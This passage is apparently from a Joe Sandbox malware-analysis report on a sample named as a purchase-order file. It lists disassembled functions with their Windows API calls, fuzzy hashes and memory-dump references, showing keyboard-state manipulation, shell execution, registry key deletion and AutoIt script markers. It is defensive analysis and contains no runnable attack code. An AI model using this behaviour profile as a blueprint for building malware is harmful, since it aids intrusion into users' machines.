                        • Opcode Fuzzy Hash: 7ebedd8766e36d3586095f66c4159093ef8d7628101ce78c2a3c78e02d486780
                        • Instruction Fuzzy Hash: BD414871D20206CBFB169F68D854798F7A8BF05335F22821AE529EB3E1D7749C60CB94
                        Function 002FA1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                        Download Yara Rule
                        APIs
                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 002FA1CE
                          • Part of subcall function 002D010A: std::exception::exception.LIBCMT ref: 002D013E
                          • Part of subcall function 002D010A: __CxxThrowException@8.LIBCMT ref: 002D0153
                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002FA205
                        • EnterCriticalSection.KERNEL32(?), ref: 002FA221
                        • _memmove.LIBCMT ref: 002FA26F
                        • _memmove.LIBCMT ref: 002FA28C
                        • LeaveCriticalSection.KERNEL32(?), ref: 002FA29B
                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002FA2B0
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 002FA2CF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                        • String ID:
                        • API String ID: 256516436-0
                        • Opcode ID: d39283918522af00c02e04919944f3545d7ed9d14d19c9167bf60c055ba7dced
                        • Instruction ID: ba566d32f0c5d9040992ac9034fdde043b04092ac5f2653f093b18624ac04653
                        • Opcode Fuzzy Hash: d39283918522af00c02e04919944f3545d7ed9d14d19c9167bf60c055ba7dced
                        • Instruction Fuzzy Hash: 89317E71A00205EBCB01DFA4DC85EAEB7B9EF45710F1480A5F904EB256DB70DE24CBA1
                        Function 00318CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 00318CF3
                        • GetDC.USER32(00000000), ref: 00318CFB
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00318D06
                        • ReleaseDC.USER32(00000000,00000000), ref: 00318D12
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00318D4E
                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00318D5F
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0031BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00318D99
                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00318DB9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                        • String ID:
                        • API String ID: 3864802216-0
                        • Opcode ID: 1c5a5bbe4599028eefcd52711bb1ba8b14bf9d891a135af86d737eb815217913
                        • Instruction ID: 374d0e5c3c864c1b10a46789281513e2a4f7fb7d75e1a41e3c1d9a7843c14fbe
                        • Opcode Fuzzy Hash: 1c5a5bbe4599028eefcd52711bb1ba8b14bf9d891a135af86d737eb815217913
                        • Instruction Fuzzy Hash: BC319C72200210BFEB168F54EC8AFEA3BADEF4A711F054055FE08DA191CB759841CBB4
                        Function 002CB40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ee9319fda196f90aae9507574c3acdc25f5edbebb26f5952c8d110e2d9484f94
                        • Instruction ID: 43aed19dc8751fc968e75ac4a92414ce845982fdea156db77dec0c91ab0e457d
                        • Opcode Fuzzy Hash: ee9319fda196f90aae9507574c3acdc25f5edbebb26f5952c8d110e2d9484f94
                        • Instruction Fuzzy Hash: 1F717F71914109EFCB1ACF98DC85EBEBB78FF89314F148259F915AA251C730AA61CF60
                        Function 00312121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 0031214B
                        • _memset.LIBCMT ref: 00312214
                        • ShellExecuteExW.SHELL32(?), ref: 00312259
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                          • Part of subcall function 002B3BCF: _wcscpy.LIBCMT ref: 002B3BF2
                        • CloseHandle.KERNEL32(00000000), ref: 00312320
                        • FreeLibrary.KERNEL32(00000000), ref: 0031232F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                        • String ID: @
                        • API String ID: 4082843840-2766056989
                        • Opcode ID: ab56266844e8a1f544da47231b5440c812f5aaa99f8dc66b69e4a1cf750e321a
                        • Instruction ID: 72dc4585c08ffea3ece1098d43c5b57835c851447561fc00d815b80988ddea1e
                        • Opcode Fuzzy Hash: ab56266844e8a1f544da47231b5440c812f5aaa99f8dc66b69e4a1cf750e321a
                        • Instruction Fuzzy Hash: 17716A74A106199FCB09EFA4C8819DEB7F5FF48310F108459E856AB351DB30AD61CF90
                        Function 002F47DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32(?), ref: 002F481D
                        • GetKeyboardState.USER32(?), ref: 002F4832
                        • SetKeyboardState.USER32(?), ref: 002F4893
                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 002F48C1
                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 002F48E0
                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 002F4926
                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002F4949
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: f7fe33793a7abba270bb82a2300048c1dc6bcb7f334a7b01e63b8f69f72ff021
                        • Instruction ID: 5f87390cab78fbb191f34777af6c25c7a7e51b848e7af1e67effd3d202621889
                        • Opcode Fuzzy Hash: f7fe33793a7abba270bb82a2300048c1dc6bcb7f334a7b01e63b8f69f72ff021
                        • Instruction Fuzzy Hash: F45129606287CA3DFB366A34CC45BBBFE995B06384F0885A9E3D5464C3C2D8EDA4D750
                        Function 002F45F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32(00000000), ref: 002F4638
                        • GetKeyboardState.USER32(?), ref: 002F464D
                        • SetKeyboardState.USER32(?), ref: 002F46AE
                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002F46DA
                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002F46F7
                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002F473B
                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002F475C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: dc604ccd99a21c5d7d36ebf0ed138b94bf153d5330dc67df27c69177676d156c
                        • Instruction ID: 1ade354c8b68cc3d8b0163716633b3bfeaab436a0203c647341d7e0a74a93864
                        • Opcode Fuzzy Hash: dc604ccd99a21c5d7d36ebf0ed138b94bf153d5330dc67df27c69177676d156c
                        • Instruction Fuzzy Hash: 435105A05247DB3DFB36AB248C41B77FEA95B06384F0844A8E2D5868C2D3D4ECA4DB50
                        Function 002F86AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcsncpy$LocalTime
                        • String ID:
                        • API String ID: 2945705084-0
                        • Opcode ID: e7e726916fcc1da70b96b7792d52b3d042271da8d24cbf2309cac029272ec222
                        • Instruction ID: 85e4f1097ce9b8bbf3354eabc9443e6126cda38f733366e265b30376c164b833
                        • Opcode Fuzzy Hash: e7e726916fcc1da70b96b7792d52b3d042271da8d24cbf2309cac029272ec222
                        • Instruction Fuzzy Hash: A2415165C30218B5DF11EBB4C886ADEF7AC9F14350F508467EA14F3261EA30EA758BA5
                        Function 0030936F Relevance: 10.6, APIs: 7, Instructions: 136networkCOMMON
                        Download Yara Rule
                        APIs
                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0034DBF0), ref: 00309409
                        • WSAGetLastError.WSOCK32(00000000), ref: 00309416
                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 0030943A
                        • #16.WSOCK32(?,?,00000000,00000000), ref: 00309452
                        • _strlen.LIBCMT ref: 00309484
                        • _memmove.LIBCMT ref: 003094CA
                        • WSAGetLastError.WSOCK32(00000000), ref: 003094F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorLast$_memmove_strlenselect
                        • String ID:
                        • API String ID: 2795762555-0
                        • Opcode ID: cecea22604692b8b903fb165676b69cea5ba349c4dcbaf9b4738092da947fa54
                        • Instruction ID: 8b51798739c9108c6b89d1b091261f58f55aaa81fe793569c984eca4c10212ae
                        • Opcode Fuzzy Hash: cecea22604692b8b903fb165676b69cea5ba349c4dcbaf9b4738092da947fa54
                        • Instruction Fuzzy Hash: 66417D75500208AFCB15EFA5CC95BEEB7BDEB48350F20416AF516972D2DB30AE11CB60
                        Function 00319D97 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00319DB0
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00319E57
                        • IsMenu.USER32(?), ref: 00319E6F
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00319EB7
                        • DrawMenuBar.USER32 ref: 00319ED0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Menu$Item$DrawInfoInsert_memset
                        • String ID: 0
                        • API String ID: 3866635326-4108050209
                        • Opcode ID: ec4c0d79cfa3d6b2e0c4c0d427b9e89deced83d58c40c9faa304337a54f6efaf
                        • Instruction ID: a76f3bc161a9f5f5d9260e85876844c932bd06fec7d009070706e5f31f6248a6
                        • Opcode Fuzzy Hash: ec4c0d79cfa3d6b2e0c4c0d427b9e89deced83d58c40c9faa304337a54f6efaf
                        • Instruction Fuzzy Hash: 98411775A00209EFDB26DF54D894BDABBF8FF09354F05802AE95597250D730ED90DB60
                        Function 00313C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00313C92
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00313CBC
                        • FreeLibrary.KERNEL32(00000000), ref: 00313D71
                          • Part of subcall function 00313C63: RegCloseKey.ADVAPI32(?), ref: 00313CD9
                          • Part of subcall function 00313C63: FreeLibrary.KERNEL32(?), ref: 00313D2B
                          • Part of subcall function 00313C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00313D4E
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00313D16
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                        • String ID:
                        • API String ID: 395352322-0
                        • Opcode ID: 5918e02307bd1b36a41f13d9f22174a8a782e5d0d370763b913f6f8f15a2de10
                        • Instruction ID: 48eb5919ce51a9e415577a5f505ea8c427dd274ce2096e06de7e485fae2d0765
                        • Opcode Fuzzy Hash: 5918e02307bd1b36a41f13d9f22174a8a782e5d0d370763b913f6f8f15a2de10
                        • Instruction Fuzzy Hash: 0531FCB1911209BFDB1A9B94EC89EFFB7BCEF08300F10056AE512E2151D6749F899B60
                        Function 00318DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00318DF4
                        • GetWindowLongW.USER32(0168ECB8,000000F0), ref: 00318E27
                        • GetWindowLongW.USER32(0168ECB8,000000F0), ref: 00318E5C
                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00318E8E
                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00318EB8
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00318EC9
                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00318EE3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LongWindow$MessageSend
                        • String ID:
                        • API String ID: 2178440468-0
                        • Opcode ID: e5b016d8779a242fcd6d09810cf9ceedc21cf08abfa3521298f504e47408b1e6
                        • Instruction ID: 29d365388a35aac73fbffb36131afa955f3897e10a0ca6e8c74fba22b6f399b1
                        • Opcode Fuzzy Hash: e5b016d8779a242fcd6d09810cf9ceedc21cf08abfa3521298f504e47408b1e6
                        • Instruction Fuzzy Hash: 92311531600211EFDB2ACF58EC85F9537A9FB4A714F1A4164F5158B2B2CB71A880DB55
                        Function 002F16F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002F1734
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002F175A
                        • SysAllocString.OLEAUT32(00000000), ref: 002F175D
                        • SysAllocString.OLEAUT32(?), ref: 002F177B
                        • SysFreeString.OLEAUT32(?), ref: 002F1784
                        • StringFromGUID2.OLE32(?,?,00000028), ref: 002F17A9
                        • SysAllocString.OLEAUT32(?), ref: 002F17B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                        • String ID:
                        • API String ID: 3761583154-0
                        • Opcode ID: fd1915b88162b90b55a997bcdb06f4a2f4854a6db9e4bb4be6949b041a784248
                        • Instruction ID: af74068fa72ae0a82aeb9f4697c5217a12cd7e71aaea5f70a83d7a70fe208039
                        • Opcode Fuzzy Hash: fd1915b88162b90b55a997bcdb06f4a2f4854a6db9e4bb4be6949b041a784248
                        • Instruction Fuzzy Hash: 3A216775610219AF9B10EFA9DC84DBBF3ECEB09360F508125FA19DB254DB70EC518760
                        Function 002F69F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002B31DA
                        • lstrcmpiW.KERNEL32(?,?), ref: 002F6A2B
                        • _wcscmp.LIBCMT ref: 002F6A49
                        • MoveFileW.KERNEL32(?,?), ref: 002F6A62
                          • Part of subcall function 002F6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 002F6DBA
                          • Part of subcall function 002F6D6D: GetLastError.KERNEL32 ref: 002F6DC5
                          • Part of subcall function 002F6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 002F6DD9
                        • _wcscat.LIBCMT ref: 002F6AA4
                        • SHFileOperationW.SHELL32(?), ref: 002F6B0C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                        • String ID: \*.*
                        • API String ID: 2323102230-1173974218
                        • Opcode ID: a063efe71c86005917c0a83d485de7282c7c97d5f335825e71beaf6f313b4809
                        • Instruction ID: 71791db789cd2977d2e63ba5cba6fa4037dce5a486a05201f8b4b74b287974c0
                        • Opcode Fuzzy Hash: a063efe71c86005917c0a83d485de7282c7c97d5f335825e71beaf6f313b4809
                        • Instruction Fuzzy Hash: 3531367181021D6ACF51EFB4E849BEDB7B89F08340F5045EAE609E3141EB319B99CF64
                        Function 002F2FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                        • API String ID: 1038674560-2734436370
                        • Opcode ID: 1ad7d28b329fa7b778186d739ce577fbbb07ea3526488c84f09020f725c2752c
                        • Instruction ID: dba9d290a4fec08f52701d3059c0b384d7d19d486ecdb8e9cc7b0f24c9111029
                        • Opcode Fuzzy Hash: 1ad7d28b329fa7b778186d739ce577fbbb07ea3526488c84f09020f725c2752c
                        • Instruction Fuzzy Hash: 98213A3213451AB6D231EA349C02FB7F3E89F65390F10413BFA4587285EF919EA6C290
                        Function 002F17C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002F180D
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002F1833
                        • SysAllocString.OLEAUT32(00000000), ref: 002F1836
                        • SysAllocString.OLEAUT32 ref: 002F1857
                        • SysFreeString.OLEAUT32 ref: 002F1860
                        • StringFromGUID2.OLE32(?,?,00000028), ref: 002F187A
                        • SysAllocString.OLEAUT32(?), ref: 002F1888
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                        • String ID:
                        • API String ID: 3761583154-0
                        • Opcode ID: d3f2643d22ca0857c4afe753602a9bd8d5b3985e569302d1e76fdd3919ca878f
                        • Instruction ID: 350e0b2ce08965c9c3d1f46c0b962f10fbbd1d8e15a27b4cf3d634886fd9f5c6
                        • Opcode Fuzzy Hash: d3f2643d22ca0857c4afe753602a9bd8d5b3985e569302d1e76fdd3919ca878f
                        • Instruction Fuzzy Hash: 94217935610105AFDB119FA9DCC9DBAB7ECEB093A0F808125FA15DB264DA70EC518B60
